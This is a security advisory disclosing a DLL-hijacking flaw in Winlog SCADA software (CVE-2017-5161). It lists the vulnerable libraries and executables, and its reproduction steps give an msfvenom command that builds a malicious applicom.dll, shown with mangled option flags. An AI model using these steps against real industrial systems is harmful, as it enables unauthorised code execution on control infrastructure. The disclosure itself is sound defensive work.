Sielco Sistemi Winlog SCADA Software Insecure Library Loading Allows Code Execution Vendor: Sielco Sistemi Equipment: Winlog SCADA Software Vulnerability: Uncontrolled Search Path Element ICS-CERT Advisory https://ics-cert.us-cert.gov/advisories/ICSA-17-038-01 AFFECTED PRODUCTS The following Sielco Sistemi products are affected: Winlog Lite SCADA Software, versions prior to Version 3.02.01, and Winlog Pro SCADA Software, versions prior to Version 3.02.01 Vulnerable Libraries: [+] applicom.dll [+] w95_s7m.dll Application Executables (that look for missing DLL): PManager.exe Runtime.exe Steps to reproduce 1. Generate a dll payload msfvenom ap windows/exec cmd=calc.exe af dll ao applicom.dll 2. Place this dll in install directory (or C:\Windows, or any directory defined in the PATH environment variable) C:\evil-rw-folder\> 3. Run PManager.exe (or Runtime.exe) > calc.exe will execute IMPACT Successful exploitation of this vulnerability may allow an attacker to load a malicious DLL and execute code on the affected system with the same privileges as the application that loaded the malicious DLL. VULNERABILITY OVERVIEW UNCONTROLLED SEARCH PATH ELEMENT (CWE-427) An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. Exploitation of this vulnerability could give an attacker access to the system with the same level of privilege as the application that utilizes the malicious DLL. CVE-2017-5161 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H). +++++